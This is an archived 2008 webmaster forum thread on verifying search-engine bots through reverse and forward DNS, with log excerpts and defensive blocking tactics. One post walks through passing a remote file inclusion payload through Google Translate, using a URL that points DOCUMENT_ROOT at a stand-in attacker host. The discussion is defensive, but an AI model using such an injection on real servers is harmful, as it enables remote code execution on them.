Identifying bots via ip and host

Forum Moderators: open

Message Too Old, No Replies

Identifying bots via ip and host

enigma1

9:56 am on Nov 16, 2008 (gmt 0)

I read a long thread earlier on, on way to identify a spider via host. One solution that was posted by incredBILL was to use the rDNS and try to resolve the ip -> host -> ip basically. That was to avoid spiders that may index a site via a proxy or someone who was trying to get in by using one of the known spider signatures in the agent field. I run some tests and I cannot see it working reliably.

I noticed at least 2 ips reading the logs, coming from the msn bot
65.55.108.194, 65.55.25.149
cannot be resolved to a host.

I saw another ip from slurp that was resolving to the .net domain instead of the .com. In both cases attempting to match the agent info with the ip and host would return a false. Does anyone knows if there is a workaround?

I could not post on that thread as it was a bit old.

incrediBILL

3:57 pm on Nov 16, 2008 (gmt 0)

If it doesn't match, don't let them in.

If you think they're legit, write to Google, Yahoo or MSN and see if they messed up.

I recently posted how I spoofed Googlebot using Google's own services, there was no host data, imagine that!

[edited by: incrediBILL at 3:58 pm (utc) on Nov. 16, 2008]

enigma1

6:02 pm on Nov 16, 2008 (gmt 0)

Yes I understand the concept but what happens if I cannot get the host from the IP because the ip does not resolve to a host address? I am just getting timeouts. At the moment I block them as it could be a proxy in-between.

wilderness

6:39 pm on Nov 16, 2008 (gmt 0)

65.55.108.194

"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"

I've had a portion of the UA denied since September 2006 when MS attempted to standardize their bot UA's.
Both the previous UA's and the 2006 standardized UA's had MSN failing to comply with robots.txt for their MEDIA bot, which resulted in my denial.

Nothing in my saved files on 25-Class C.
What does the UA look like?

I could not post on that thread as it was a bit old.

As an aside; you may always provide a link to an old thread (in a newer thread) for reference.

Don

enigma1

7:07 pm on Nov 16, 2008 (gmt 0)

the ua is exactly what you posted Don. There are plenty of accesses in my logs from that ip over the past 2 weeks that I checked. They all consistent, the ua is the same. But if the ip is not resolved, I cannot have some code that validates it on the fly. It can be a different IP and come through a proxy. So my question is should I block them by default or fall back checking some ip ranges or do something else perhaps?

As of the reference, yes, here is the link to the thread I was reading earlier on:
[webmasterworld.com...]

wilderness

7:37 pm on Nov 16, 2008 (gmt 0)

Since the bot has not been compliants with robots.txt I use:

SetEnvIfNoCase User-Agent msnbot\-media keep_out

which does not even allow them access to robots.txt (bad choice for most), as a result the bot keeps returning (due to my aforementioned bad choice)regulary on endless crawls eating 403's.

So my question is should I block them by default or fall back checking some ip ranges or do something else perhaps?

Neither I, nor anybody else may provide insight into what is best for your own site (s).
We each must decide what is beneficial or detrimental.

I am able to convey that denying access to "msnbot-media" has NOT affected my other msn crawls.

Don

enigma1

10:40 am on Nov 20, 2008 (gmt 0)

Don, I see other IPs though that can be traced back to Microsoft servers but do not resolve and come up with the usual msnbot agent. Here is an example from the log:

65.55.232.29 - - [18/Nov/2008:01:39:16 -0500] "GET /someurl.html HTTP/1.1" 200 10415 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"

Another thing I notice is that ips that successfully resolved one time do not resolve afterwards. I placed a loggin mechanism to see when and how often the host has a different value when the ip is resolved

wilderness

2:33 pm on Nov 20, 2008 (gmt 0)

enigma,
This thread:
[webmasterworld.com...]

is an example of an MSN issue.
65.55.165.zz, not a bot, however somehow with the ability to grab pages in a fashion similar to a bot.

I focused on the "search.live" denial, (which I may change)at the time because I was not so sure the user would not simply returm on another Class C range.
The user returns and always with the same IP and I've over-reacted by penalizing ALL "search.live" users.

MSN offers us "practices" that others simply don't use.
The 131.107.-.- and the many things that have come through those IP's in five years are one example.

enigma1

4:30 pm on Nov 20, 2008 (gmt 0)

Don, do you mean these are actual users (humans) that indirectly come from the livesearch? (eg: if you were checking the cached page?) I see accesses at the robots.txt file at the same time along with other scripts though:

65.55.232.29 - - [03/Nov/2008:13:00:08 -0500] "GET /robots.txt HTTP/1.1" 200 85 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"

Why it would need the robots.txt at that time?

As of the IP range I checked the logs again and I see different UAs some with valid browser signatures. Now what I don't see, is none of these accesses, although they occur very often (same day), do not follow the headers the server sends, like the 304 cache.

And finally I see like 100 different page accesses on the server within the same minute from that ip range you posted.

wilderness

5:10 pm on Nov 20, 2008 (gmt 0)

Don, do you mean these are actual users (humans) that indirectly come from the livesearch? (eg: if you were checking the cached page?) I see accesses at the robots.txt file at the same time along with other scripts though:

enigma,
My apologies, I didn't mean to confuse the issue.
I merely presented it because of the same occurence of IP as you had provided previously.

The link to the other thread was a sort of pre-fetch by "search.live". I'm inclined to believe that it was either the same human using the search as some sort of proxy and/or tool.
The page requests were all in succession and absent of requests for robots.txt, images or CSS.
It has happened on more occassion, since the intial date and all by the same IP.

Early recognition and/or action against these "bot-like" requests (even though they may not be bots), tend to nip things in the backside before they escalate (thus this forum), or the user locates a more effective tool.

I don't utilize header checks, thus I'm no help in that regard. Bill, Jim and many of the others do use headers.

In addition, I've numerous references in my logs to the 65.55.232. Class C that you've provided (no reason for me NOTt to believe that it's a valid MSN bot). Even be presented with invalid headers.
Some of these requests (i. e., 65.55.232.) were in close time-proximity to the 65.55.165.zz "search.live" requests, however NOT in succession or close enough time-proximity that I could associate BOTH IP's as the same data requests.

enigma1

5:36 pm on Nov 20, 2008 (gmt 0)

Don, I did a quick search to see if I could find some info. There might be an abuse on that ip range, for instance I checked for the 65.55.232.48 that also shows in my logs with the same pattern, having a normal UA.

[projecthoneypot.org...]

Perhaps it shows that some of the services Microsoft provides are abused. What I don't understand is how comes they're all over the place. There way too many for them not to know about.

dstiles

10:56 pm on Nov 20, 2008 (gmt 0)

All the hits I get on 65.55.232.* that are not msnbot (and many are) arrive with a variety of browser UAs, some of them in my "suspicious" category (frequently used by scrapers etc) but all coming with the referer search.live.com/results.aspx?q=keyword. The same keyword is used several times, each with a different target page on the same site.

This has been covered elsewhere on WWW but it looks like an attempt by MS to verify their own results. Certainly I'm only seeing a handful of non-bot hits a day, mostly spaced out (this month: 41 non-bots to 282 bots). Could be they are tring to tie the bot and non-bot together. It doesn't look like third party usage here.

One possibility, I suppose, is that they are using the non-bot UA to grab cache pages (I haven't checked for imge-fetching).

I'm seeing a similar pattern with google. I've given up trying to understand yahoo / ask's wild forays - ask may soon be banned!

enigma1

1:34 pm on Nov 21, 2008 (gmt 0)

dstiles, careful with the bans. My opinion is to just block the attempt if you detect it.

There are a lot of internet services that can be abused by an attacker to serve his purpose. For instance search engines have translations services where an IP may not resolved to a host name although it does belong to the search engine's server ip range, can be activated by anyone who requests a page translation and then the link to "translate" is forged to contain say some SQL injection or Remote File Inclusion and the like.

If you see the other link I posted above it shows the same IP to be used for sending spam emails. With the particular honeypot, it seems blacklisted. In reality it could be just one of the service Microsoft provides (eg: accounts), where someone injected some script to do his dirty job.

I am seeing lots of stuff in the server logs with RFI attempts for instance, coming from yahoo accounts. Seems like these accounts were opened specifically for that purpose. Some "txt" files that are hard to detect are then used for the RFI attempts and contain some actual code like php, so if the security hole of the specific script/web-engine/server is not patched the attacker may gain direct or indirect control.

Upto this point I am unable to find some reliable way to detect whether a sever access is legitimate or indirect and/or reliably identify bots vs humans. In contrast I see more and more evidence where a script could be setup in such a way to behave like a real person with a proper browser.

dstiles

8:48 pm on Nov 21, 2008 (gmt 0)

Enigma1 - thanks for the warning but I have other things in place to help determine exactly what's coming in. There are abuses of SE IP blocks and some of these get a temporary ban. In other cases the abuse is by the SEs themselves and Ask and Yahoo are rapidly coming into that category, in my experience and opinion. I won't block them for a while yet, though, just monitor them and curtail their excesses.

Where I discover abusive avtivity from a server farm I tend to block the IP range for that farm. There are a lot of nasties and very few legitimate bots that come from server farms, and I think I've whitelisted all of the good ones I'm prepared to give access to.

enigma1

5:16 pm on Nov 23, 2008 (gmt 0)

Ok, I found some external information here regarding a possible scenario that could explain these strange visits by bots.

[voices.washingtonpost.com...]

The article is recent and implies that services of major vendors are abused for various spam purposes.

incrediBILL

8:48 pm on Nov 23, 2008 (gmt 0)

Now you know why I use full trip DNS as my sole solution anymore because I've found multiple ways to spoof site security via all the big SEs, like the Google translator example I gave recently.

If just "good enough" is OK, use IP ranges, otherwise DNS is the only way to fly.

enigma1

10:10 pm on Nov 23, 2008 (gmt 0)

Bill, yes I agree I also tested the google translation service (mentioned couple of posts earlier in this thread) and noticed you could RFI and XSS through it. The ip recorded belongs to google pretty much like it shows with the msnbot mentioned earlier. Not to mention Lycos I saw, not just rfi attempts coming with files stored in their servers but even if you try to notify them for abuse I see iframe and jscripts in their abuse forms which could indicate their server is compromised.

The DNS resolution is also something I deploy for the scripts. It won't stop them always, they still appear with valid host names and valid ips and UAs. DNS spoof is another area they exploit.

One other thing that may sound awkward I am experimenting with, is to simply perform a search against an IP with popular search engines. If I see results coming up and the IP attempts to get in pretending to be human the odds are to be some sort of hack or spam attempt.

The results that typically come up are from web-statistics posted by various hosts (unbelievable but true) when the attempt caused some sort of error (eg: 404). Although this practice is far from perfect it may give a hint on the intentions of the visitor.

incrediBILL

10:44 pm on Nov 23, 2008 (gmt 0)

The DNS resolution is also something I deploy for the scripts. It won't stop them always, they still appear with valid host names and valid ips and UAs. DNS spoof is another area they exploit.

Totally impossible using full trip DNS.

You do reverse DNS then do a forward DNS and see if the IP matches.

If it doesn't match it's DNS spoofing.

For efficiency and speed, I cache that information for 24 hours then test it again.

[edited by: incrediBILL at 10:45 pm (utc) on Nov. 23, 2008]

enigma1

12:08 pm on Nov 24, 2008 (gmt 0)

Bill I am seeing other things. Here is a presentation document (start from slide-9).
[doxpara.com...]
And it's recent. If I understand correctly you can do a full trip DNS and still get a fake answer that "looks ok". Now there are workarounds in progress but I am not sure when they will be deployed and what has been done to this point. They don't seem to be in place right now. My logs still show strange traffic and hack attempts coming up from all over the world.

There is another detailed page that explains pretty much everything about the approach.
[unixwiz.net...]
It also shows workarounds that evolved to counter the effects of dns cache poisoning.

Yes caching the results is quite easy, but don't we need to be sure the results are right?

incrediBILL

3:36 pm on Nov 24, 2008 (gmt 0)

enigma1, there's a huge difference between some simple DNS spoofing that anyone can do vs. the DNS poisoning those documents talk about.

I can DNS spoof any IP I own to return "crawl*.googlebot.com".

However, if you run "crawl*.googlebot.com" to get the IP it won't match because I don't have control of googlebot.com so I can't fake it in that direction.

Worrying about DNS cache poising is like worrying about IP spoofing, it's possible but highly unlikely. If you get nailed with DNS poisoning there'll be a whole bunch of other people also in trouble, you won't be alone.

When I discuss caching the results, I mean I merely record the results of the full trip DNS check to a temporary file under my control.

If the results are spoofed, I record spoofed results.

Can't worry about that as I have to assume my host DNS servers are secure as they updated all the patches mentioned in the PPT above.

dstiles

8:45 pm on Nov 24, 2008 (gmt 0)

And what do you do with the 72.14.193.* range, Bill?

Obviously part of google's range but it has no rDNS and arrives with anything from a blank UA to a google translate one. It seems it can be used by google to service translations but there is no rDNS check, only the fact that it belongs to google. In the case of blank and other scraper UAs it's probably going via a proxy, although it doesn't register as such in my logs.

I'm loathe to block the range, even if it comes up with scrapers, since it also seems to be a legit google service. But if google won't admit the usage and can't be bothered to designate specific and separate IPs for their own services and for proxies what else is there to do? Either lose the translation or other legit services or accept the scrape attempts.

I can't see double-checking the DNS in this instance will result in anything other than a block, but that could well be the wrong action at least some of the time.

wilderness

9:23 pm on Nov 24, 2008 (gmt 0)

And what do you do with the 72.14.193.* range, Bill?

Bill's a pest ;)

I'd be more interested if Jim has made any adjustments in his end?

Personally, I've had the 72.14. denied for an eternity.
And most of the other SE-based extra-tools, however I'm an extremist and it has been suggested jokingly that I should just "deny-all" :)
Don

incrediBILL

9:46 pm on Nov 24, 2008 (gmt 0)

And what do you do with the 72.14.193.* range, Bill?

First off, you have to qualify what kind of activity you see in that range.

Remember, I don't run hard rules mostly, I run dynamic scripts that analyze the behavior on the fly so any IP that is being multi-purposed in a SE's range of IPs will be dealt with based on what it's currently doing.

If it says googlebot and the DNS doesn't resolve to crawl*.googlebot.com, it's instantly blocked therefore someone trying to spoof googlebot via the translator gets the heave ho.

If it's not a valid browser, says "Java" or something similar, blocked.

Google translator is permitted but each IP forwarded by the proxy is tracked separately and the white listed rules for user agents will still be imposed so anything other than an allowed browser is blocked.

Someone's script trying to scrape thru the translator gets to have a conversation with with a captcha, etc.

Basically, I don't have a single answer to your question, but a series of strategies designed to stop the automated nonsense and still let humans do their thing as much as possible.

I can't see double-checking the DNS in this instance will result in anything other than a block, but that could well be the wrong action at least some of the time.

Been doing it for 2 years, ever since the SEs said it was the proper method of validation, with no ill effects.

[edited by: incrediBILL at 9:52 pm (utc) on Nov. 24, 2008]

enigma1

12:37 pm on Nov 25, 2008 (gmt 0)

First off, you have to qualify what kind of activity you see in that range.

Bill, here is an example what I was trying to mention earlier on.

1. goto [translate.google.com...]
2. say we want translation from english to spanish
3. populate the "translate a web page" url


http://www.example.com/index.html/?_SERVER[DOCUMENT_ROOT]=http://rfi.example.com/nasty.htm

and there you have an rfi attempt. Would you let this pass through and take a chance against the server scripts?

In the particular case google should not allow direct translation but perhaps only translate directly from pages it contains in its cache. Avoiding the direct access and assuming a bot indexes a site from the domain only (and not from external links that can also make rfi attempts) it would make sense. But instead it can be used as an open uri for rfi attempts (or content scrap and the like).

incrediBILL

4:31 pm on Nov 25, 2008 (gmt 0)

Would you let this pass through and take a chance against the server scripts?

I block with "http:" in the URL parameters to stop hack attempts so no matter where the hack attempt comes from, it's thwarted automatically.

Not even the SE's get a free pass with that one.

dstiles

11:36 pm on Nov 25, 2008 (gmt 0)

Thanks, Bill. Enlightening! In general I record mis-use of IP ranges such as the 72.14.*.* range, either as real bot activity or as non-bot. I also record "translate".

I can't afford to block as cavalierly as Wilderness, unfortunately, as my customers get upset if I'm over-zealous. :(

enigma1

8:45 am on Nov 29, 2008 (gmt 0)

Here is another thing I noticed yesterday from the logs. They show accesses coming from ips from the msft servers. It is interesting to note the following:

1. A new page/article was published yesterday on a site (site has no particular rank). Where sample_page.html is basically the new page. The real name of the page was replaced with sample_page.html
2. The first IP is the msnbot, crawls the page for the first time. First accesses robots.txt, then accesses the new page. That IP is resolved so the real page content is given.
3. The second IP also comes from the msft servers and accesses the same page 2 minutes later. It contains a referrer which implies the page was basically found via the live facility. The 2nd ip does not resolve to a ptr, rnds does not return anything.

Log Entries:

65.55.105.16 - - [28/Nov/2008:19:49:42 -0500] "GET /robots.txt HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.16 - - [28/Nov/2008:19:49:43 -0500] "GET /sample_page.html HTTP/1.1" 200 43435 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.107.245 - - [28/Nov/2008:19:51:42 -0500] "GET /sample_page.html HTTP/1.0" 200 9799 "http://search.live.com/results.aspx?q=sample_page" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"

In other words the log entries imply: a) msnbot comes in crawls new page. b) within 2 minutes the page is indexed, published in live someone searched for it and was accessed right away by "someone".

The UA is fake of course the 2nd ip access was done by a bot and receives something else instead of the real page content.

wilderness

4:32 pm on Nov 29, 2008 (gmt 0)

The UA is fake of course the 2nd ip access was done by a bot and receives something else instead of the real page content.

This refer (search.live.) eats 403's on my sites!
Too bad for the innocent and/or valid users.

I had sixteen requests in succession this morning from the 165 Class C, while utilizing fifteen different Class D's.
No requests for robots or images.

Many of the refers contained the name of the page (absent of extension).

MSN needs to resolve these issues, else I'm going to be adding more Class C's to my denials, which I'm sure will lead to some valid bots. :(

Don

Samizdata

5:04 pm on Nov 29, 2008 (gmt 0)

Too bad for the innocent and/or valid users

I have no reason to believe that any sentient living being uses Live Search.

Could it be that Live's reported market share consists entirely of robotic fetches?

...

wilderness

5:20 pm on Nov 29, 2008 (gmt 0)

I have no reason to believe that any sentient living being uses Live Search.

I had ONE ;) just yesterday, which was a valid widget search topic.
The visitor initially entered one of my sites and was denied based on the refer.
I've another directory which does not place that restriction on live.search, however the images and supporting files (CSS) are from the sites other directories and 403'd. Once the visitor was allowed access via the open-directory (after being denied in the initial request)?
Normal traffic patterns occurred, which were on-topic for the initial search.

Course, this may be a rare exception!

Don